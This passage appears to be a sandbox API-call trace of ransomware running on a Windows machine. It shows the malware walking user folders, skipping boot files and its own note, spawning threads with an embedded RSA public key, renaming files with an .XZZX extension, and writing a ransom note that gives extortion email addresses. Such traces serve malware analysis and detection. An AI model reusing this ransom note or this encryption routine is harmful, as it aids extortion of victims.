MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.388] lstrcpyW (in: lpString1=0x17be7c, lpString2="A58916D017654CD0CF379F2B1B923118.XZZX" | out: lpString1="A58916D017654CD0CF379F2B1B923118.XZZX") returned="A58916D017654CD0CF379F2B1B923118.XZZX" [0112.388] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a4 [0112.389] Sleep (dwMilliseconds=0x96) [0112.544] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.544] lstrcmpW (lpString1="D9B986602FBC15FEC37446303428FA46.XZZX", lpString2="..") returned 1 [0112.544] lstrcmpW (lpString1="D9B986602FBC15FEC37446303428FA46.XZZX", lpString2=".") returned 1 [0112.544] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0112.544] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="ntldr") returned 0x0 [0112.544] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="NTLDR") returned 0x0 [0112.544] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0112.544] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="ntdetect.com") returned 0x0 [0112.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0112.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0112.544] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0112.544] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.544] lstrcpyW (in: lpString1=0x17be7c, lpString2="D9B986602FBC15FEC37446303428FA46.XZZX" | out: lpString1="D9B986602FBC15FEC37446303428FA46.XZZX") returned="D9B986602FBC15FEC37446303428FA46.XZZX" [0112.544] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a8 [0112.545] Sleep (dwMilliseconds=0x96) [0112.700] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.700] lstrcmpW (lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpString2="..") returned 1 [0112.700] lstrcmpW (lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpString2=".") returned 1 [0112.700] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0112.700] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="ntldr") returned 0x0 [0112.700] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="NTLDR") returned 0x0 [0112.700] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0112.700] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="ntdetect.com") returned 0x0 [0112.700] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0112.700] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0112.700] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0112.700] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.700] lstrcpyW (in: lpString1=0x17be7c, lpString2="FD9D491315D8C1EEE26AF31719F0A636.XZZX" | out: lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned="FD9D491315D8C1EEE26AF31719F0A636.XZZX" [0112.700] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4ac [0112.701] Sleep (dwMilliseconds=0x96) [0112.856] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.856] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0112.856] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0112.856] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0112.856] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0112.856] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0112.856] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0112.857] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0112.857] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0112.857] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0112.857] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0112.857] SetErrorMode (uMode=0x1) returned 0x1 [0112.857] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT") returned 74 [0112.857] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0112.857] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0112.857] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x4b0) returned 0x0 [0112.857] RegQueryValueExW (in: hKey=0x4b0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbb670, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cbb670*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0112.857] RegCloseKey (hKey=0x4b0) returned 0x0 [0112.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0112.857] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0112.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b0 [0112.859] CloseHandle (hObject=0x4b0) returned 1 [0112.859] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0112.859] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="Windows Live" [0112.859] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0112.859] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0112.859] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0112.859] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.859] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0112.859] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.859] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.859] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.859] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.859] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.859] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0112.860] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0112.860] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0112.860] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0112.860] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0112.860] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0112.860] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0112.860] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0112.860] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0112.860] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0112.860] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0112.860] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0112.860] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0112.860] SetErrorMode (uMode=0x1) returned 0x1 [0112.860] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0112.860] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0112.861] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0112.861] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0112.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0112.862] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="Links" [0112.862] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0112.862] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0112.862] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0112.862] lstrcmpW (lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX", lpString2="..") returned 1 [0112.862] lstrcmpW (lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX", lpString2=".") returned 1 [0112.862] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0112.862] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="ntldr") returned 0x0 [0112.862] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="NTLDR") returned 0x0 [0112.862] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0112.862] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="ntdetect.com") returned 0x0 [0112.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0112.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0112.862] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0112.862] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.862] lstrcpyW (in: lpString1=0x17cf1c, lpString2="02D36BF7229FBF1A2D198367271CA362.XZZX" | out: lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX") returned="02D36BF7229FBF1A2D198367271CA362.XZZX" [0112.862] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0112.862] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4b8 [0112.863] Sleep (dwMilliseconds=0x96) [0113.012] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.012] lstrcmpW (lpString1="61C67744188385C0EADA50E91CF06A08.XZZX", lpString2="..") returned 1 [0113.012] lstrcmpW (lpString1="61C67744188385C0EADA50E91CF06A08.XZZX", lpString2=".") returned 1 [0113.012] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0113.012] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="ntldr") returned 0x0 [0113.012] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="NTLDR") returned 0x0 [0113.012] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0113.012] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="ntdetect.com") returned 0x0 [0113.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0113.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0113.012] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0113.012] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.012] lstrcpyW (in: lpString1=0x17cf1c, lpString2="61C67744188385C0EADA50E91CF06A08.XZZX" | out: lpString1="61C67744188385C0EADA50E91CF06A08.XZZX") returned="61C67744188385C0EADA50E91CF06A08.XZZX" [0113.012] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0113.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4bc [0113.013] Sleep (dwMilliseconds=0x96) [0113.168] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.168] lstrcmpW (lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpString2="..") returned 1 [0113.168] lstrcmpW (lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpString2=".") returned 1 [0113.168] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0113.168] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="ntldr") returned 0x0 [0113.168] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="NTLDR") returned 0x0 [0113.168] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0113.168] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="ntdetect.com") returned 0x0 [0113.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0113.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0113.168] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0113.168] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC 